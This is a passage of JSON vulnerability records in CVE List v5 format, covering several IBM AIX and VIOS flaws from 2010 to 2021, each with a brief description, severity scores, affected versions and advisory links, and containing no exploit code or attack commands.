"https://www.ibm.com/support/pages/node/6515496" }, { "name": "https://www.ibm.com/support/pages/node/6538700", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6538700 (AIX)", "url": "https://www.ibm.com/support/pages/node/6538700" }, { "name": "ibm-aix-cve202138990-code-exec (212952)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/212952" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2021-38990", "datePublished": "2022-01-07T17:55:27.439355Z", "dateReserved": "2021-08-16T00:00:00", "dateUpdated": "2024-09-16T18:38:43.675Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-38996
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6560390 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/213076 | vdb-entry, x_refsource_XF |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T01:58:17.158Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6560390" }, { "name": "ibm-aix-cve202138997-dos (213076)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/213076" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "VIOS", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.1" } ] }, { "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.1" }, { "status": "affected", "version": "7.2" }, { "status": "affected", "version": "7.3" } ] } ], "datePublic": "2022-03-01T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX kernel to cause a denial of service. IBM X-Force ID: 213076." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "NONE", "privilegesRequired": "NONE", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 5.4, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.0/I:N/UI:N/A:H/C:N/AC:L/PR:N/AV:L/S:U/E:U/RL:O/RC:C", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Denial of Service", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-03-02T16:35:15", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6560390" }, { "name": "ibm-aix-cve202138997-dos (213076)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/213076" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2022-03-01T00:00:00", "ID": "CVE-2021-38996", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "VIOS", "version": { "version_data": [ { "version_value": "3.1" } ] } }, { "product_name": "AIX", "version": { "version_data": [ { "version_value": "7.1" }, { "version_value": "7.2" }, { "version_value": "7.3" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX kernel to cause a denial of service. IBM X-Force ID: 213076." } ] }, "impact": { "cvssv3": { "BM": { "A": "H", "AC": "L", "AV": "L", "C": "N", "I": "N", "PR": "N", "S": "U", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Denial of Service" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/6560390", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6560390 (AIX)", "url": "https://www.ibm.com/support/pages/node/6560390" }, { "name": "ibm-aix-cve202138997-dos (213076)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/213076" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2021-38996", "datePublished": "2022-03-02T16:35:15.526010Z", "dateReserved": "2021-08-16T00:00:00", "dateUpdated": "2024-09-17T00:56:49.906Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2012-4845
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.ibm.com/support/docview.wss?uid=isg1IV28715 | vendor-advisory, x_refsource_AIXAPAR | |
http://www.ibm.com/support/docview.wss?uid=isg1IV23331 | vendor-advisory, x_refsource_AIXAPAR | |
http://aix.software.ibm.com/aix/efixes/security/ftp_advisory1.asc | x_refsource_CONFIRM | |
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A19695 | vdb-entry, signature, x_refsource_OVAL | |
http://www.ibm.com/support/docview.wss?uid=isg1IV28785 | vendor-advisory, x_refsource_AIXAPAR | |
http://www.ibm.com/support/docview.wss?uid=isg1IV28787 | vendor-advisory, x_refsource_AIXAPAR | |
http://www.securityfocus.com/bid/56134 | vdb-entry, x_refsource_BID | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/79279 | vdb-entry, x_refsource_XF |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T20:50:17.417Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "IV28715", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV28715" }, { "name": "IV23331", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV23331" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://aix.software.ibm.com/aix/efixes/security/ftp_advisory1.asc" }, { "name": "oval:org.mitre.oval:def:19695", "tags": [ "vdb-entry", "signature", "x_refsource_OVAL", "x_transferred" ], "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A19695" }, { "name": "IV28785", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV28785" }, { "name": "IV28787", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV28787" }, { "name": "56134", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/56134" }, { "name": "aix-ftp-setuid(79279)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/79279" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2012-10-18T00:00:00", "descriptions": [ { "lang": "en", "value": "The FTP client in IBM AIX 6.1 and 7.1, and VIOS 2.2.1.4-FP-25 SP-02, does not properly manage privileges in an RBAC environment, which allows attackers to bypass intended file-read restrictions by leveraging the setuid installation of the ftp executable file." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2017-09-18T12:57:01", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "name": "IV28715", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV28715" }, { "name": "IV23331", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV23331" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://aix.software.ibm.com/aix/efixes/security/ftp_advisory1.asc" }, { "name": "oval:org.mitre.oval:def:19695", "tags": [ "vdb-entry", "signature", "x_refsource_OVAL" ], "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A19695" }, { "name": "IV28785", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV28785" }, { "name": "IV28787", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV28787" }, { "name": "56134", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/56134" }, { "name": "aix-ftp-setuid(79279)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/79279" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "ID": "CVE-2012-4845", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "The FTP client in IBM AIX 6.1 and 7.1, and VIOS 2.2.1.4-FP-25 SP-02, does not properly manage privileges in an RBAC environment, which allows attackers to bypass intended file-read restrictions by leveraging the setuid installation of the ftp executable file." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "IV28715", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV28715" }, { "name": "IV23331", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV23331" }, { "name": "http://aix.software.ibm.com/aix/efixes/security/ftp_advisory1.asc", "refsource": "CONFIRM", "url": "http://aix.software.ibm.com/aix/efixes/security/ftp_advisory1.asc" }, { "name": "oval:org.mitre.oval:def:19695", "refsource": "OVAL", "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A19695" }, { "name": "IV28785", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV28785" }, { "name": "IV28787", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV28787" }, { "name": "56134", "refsource": "BID", "url": "http://www.securityfocus.com/bid/56134" }, { "name": "aix-ftp-setuid(79279)", "refsource": "XF", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/79279" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2012-4845", "datePublished": "2012-10-20T10:00:00", "dateReserved": "2012-09-06T00:00:00", "dateUpdated": "2024-08-06T20:50:17.417Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2016-0281
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.securitytracker.com/id/1036481 | vdb-entry, x_refsource_SECTRACK | |
http://www.securityfocus.com/bid/92193 | vdb-entry, x_refsource_BID | |
http://www-01.ibm.com/support/docview.wss?uid=swg1IV84184 | vendor-advisory, x_refsource_AIXAPAR | |
http://www-01.ibm.com/support/docview.wss?uid=swg1IV82421 | vendor-advisory, x_refsource_AIXAPAR | |
http://www-01.ibm.com/support/docview.wss?uid=swg1IV81459 | vendor-advisory, x_refsource_AIXAPAR | |
http://www-01.ibm.com/support/docview.wss?uid=swg1IV80569 | vendor-advisory, x_refsource_AIXAPAR | |
http://www-01.ibm.com/support/docview.wss?uid=swg1IV81357 | vendor-advisory, x_refsource_AIXAPAR | |
http://aix.software.ibm.com/aix/efixes/security/mustendd_advisory.asc | x_refsource_CONFIRM |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T22:15:23.185Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "1036481", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1036481" }, { "name": "92193", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/92193" }, { "name": "IV84184", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV84184" }, { "name": "IV82421", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV82421" }, { "name": "IV81459", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV81459" }, { "name": "IV80569", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV80569" }, { "name": "IV81357", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV81357" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://aix.software.ibm.com/aix/efixes/security/mustendd_advisory.asc" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2016-07-26T00:00:00", "descriptions": [ { "lang": "en", "value": "The mustendd driver in IBM AIX 5.3, 6.1, 7.1, and 7.2 and VIOS 2.2.x, when the jumbo_frames feature is not enabled, allows remote attackers to cause a denial of service (FC1763 or FC5899 adapter crash) via crafted packets." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2017-08-31T09:57:01", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "name": "1036481", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1036481" }, { "name": "92193", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/92193" }, { "name": "IV84184", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV84184" }, { "name": "IV82421", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV82421" }, { "name": "IV81459", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV81459" }, { "name": "IV80569", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV80569" }, { "name": "IV81357", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV81357" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://aix.software.ibm.com/aix/efixes/security/mustendd_advisory.asc" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "ID": "CVE-2016-0281", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "The mustendd driver in IBM AIX 5.3, 6.1, 7.1, and 7.2 and VIOS 2.2.x, when the jumbo_frames feature is not enabled, allows remote attackers to cause a denial of service (FC1763 or FC5899 adapter crash) via crafted packets." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "1036481", "refsource": "SECTRACK", "url": "http://www.securitytracker.com/id/1036481" }, { "name": "92193", "refsource": "BID", "url": "http://www.securityfocus.com/bid/92193" }, { "name": "IV84184", "refsource": "AIXAPAR", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV84184" }, { "name": "IV82421", "refsource": "AIXAPAR", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV82421" }, { "name": "IV81459", "refsource": "AIXAPAR", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV81459" }, { "name": "IV80569", "refsource": "AIXAPAR", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV80569" }, { "name": "IV81357", "refsource": "AIXAPAR", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV81357" }, { "name": "http://aix.software.ibm.com/aix/efixes/security/mustendd_advisory.asc", "refsource": "CONFIRM", "url": "http://aix.software.ibm.com/aix/efixes/security/mustendd_advisory.asc" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2016-0281", "datePublished": "2016-08-08T01:00:00", "dateReserved": "2015-12-08T00:00:00", "dateUpdated": "2024-08-05T22:15:23.185Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2010-3405
Vulnerability from cvelistv5
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-07T03:11:43.776Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "IZ82245", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ82245" }, { "name": "IZ83942", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ83942" }, { "name": "ADV-2010-2377", "tags": [ "vdb-entry", "x_refsource_VUPEN", "x_transferred" ], "url": "http://www.vupen.com/english/advisories/2010/2377" }, { "name": "oval:org.mitre.oval:def:12214", "tags": [ "vdb-entry", "signature", "x_refsource_OVAL", "x_transferred" ], "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12214" }, { "name": "43207", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/43207" }, { "name": "IZ84167", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ84167" }, { "name": "IZ81819", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ81819" }, { "name": "ibm-aix-sasnap-bo(61774)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/61774" }, { "name": "IZ82630", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ82630" }, { "name": "41446", "tags": [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred" ], "url": "http://secunia.com/advisories/41446" }, { "name": "IZ83909", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ83909" }, { "name": "IZ83975", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ83975" }, { "name": "1024430", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://securitytracker.com/id?1024430" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://aix.software.ibm.com/aix/efixes/security/sa_snap_advisory.asc" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2010-09-13T00:00:00", "descriptions": [ { "lang": "en", "value": "Buffer overflow in sa_snap in the bos.esagent fileset in IBM AIX 6.1, 5.3, and earlier and VIOS 2.1, 1.5, and earlier allows local users to leverage system group membership and gain privileges via unspecified vectors." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2017-09-18T12:57:01", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "name": "IZ82245", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ82245" }, { "name": "IZ83942", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ83942" }, { "name": "ADV-2010-2377", "tags": [ "vdb-entry", "x_refsource_VUPEN" ], "url": "http://www.vupen.com/english/advisories/2010/2377" }, { "name": "oval:org.mitre.oval:def:12214", "tags": [ "vdb-entry", "signature", "x_refsource_OVAL" ], "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12214" }, { "name": "43207", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/43207" }, { "name": "IZ84167", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ84167" }, { "name": "IZ81819", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ81819" }, { "name": "ibm-aix-sasnap-bo(61774)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/61774" }, { "name": "IZ82630", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ82630" }, { "name": "41446", "tags": [ "third-party-advisory", "x_refsource_SECUNIA" ], "url": "http://secunia.com/advisories/41446" }, { "name": "IZ83909", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ83909" }, { "name": "IZ83975", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ83975" }, { "name": "1024430", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://securitytracker.com/id?1024430" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://aix.software.ibm.com/aix/efixes/security/sa_snap_advisory.asc" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2010-3405", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Buffer overflow in sa_snap in the bos.esagent fileset in IBM AIX 6.1, 5.3, and earlier and VIOS 2.1, 1.5, and earlier allows local users to leverage system group membership and gain privileges via unspecified vectors." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "IZ82245", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ82245" }, { "name": "IZ83942", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ83942" }, { "name": "ADV-2010-2377", "refsource": "VUPEN", "url": "http://www.vupen.com/english/advisories/2010/2377" }, { "name": "oval:org.mitre.oval:def:12214", "refsource": "OVAL", "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12214" }, { "name": "43207", "refsource": "BID", "url": "http://www.securityfocus.com/bid/43207" }, { "name": "IZ84167", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ84167" }, { "name": "IZ81819", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ81819" }, { "name": "ibm-aix-sasnap-bo(61774)", "refsource": "XF", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/61774" }, { "name": "IZ82630", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ82630" }, { "name": "41446", "refsource": "SECUNIA", "url": "http://secunia.com/advisories/41446" }, { "name": "IZ83909", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ83909" }, { "name": "IZ83975", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ83975" }, { "name": "1024430", "refsource": "SECTRACK", "url": "http://securitytracker.com/id?1024430" }, { "name": "http://aix.software.ibm.com/aix/efixes/security/sa_snap_advisory.asc", "refsource": "CONFIRM", "url": "http://aix.software.ibm.com/aix/efixes/security/sa_snap_advisory.asc" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2010-3405", "datePublished": "2010-09-16T20:00:00", "dateReserved": "2010-09-16T00:00:00", "dateUpdated": "2024-08-07T03:11:43.776Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-29861
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6516786 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/206085 | vdb-entry, x_refsource_XF |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T22:18:03.152Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6516786" }, { "name": "ibm-aix-cve202129861-info-disc (206085)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/206085" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.1" }, { "status": "affected", "version": "7.2" } ] }, { "product": "VIOS", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.1" } ] } ], "datePublic": "2021-11-16T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM AIX 7.1, 7.2, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in EFS to expose sensitive information. IBM X-Force ID: 206085." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "NONE", "privilegesRequired": "NONE", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 5.4, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:L/PR:N/S:U/I:N/C:H/A:N/UI:N/AC:L/E:U/RC:C/RL:O", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Obtain Information", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2021-11-17T14:00:16", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6516786" }, { "name": "ibm-aix-cve202129861-info-disc (206085)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/206085" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2021-11-16T00:00:00", "ID": "CVE-2021-29861", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "AIX", "version": { "version_data": [ { "version_value": "7.1" }, { "version_value": "7.2" } ] } }, { "product_name": "VIOS", "version": { "version_data": [ { "version_value": "3.1" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM AIX 7.1, 7.2, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in EFS to expose sensitive information. IBM X-Force ID: 206085." } ] }, "impact": { "cvssv3": { "BM": { "A": "N", "AC": "L", "AV": "L", "C": "H", "I": "N", "PR": "N", "S": "U", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Obtain Information" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/6516786", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6516786 (AIX)", "url": "https://www.ibm.com/support/pages/node/6516786" }, { 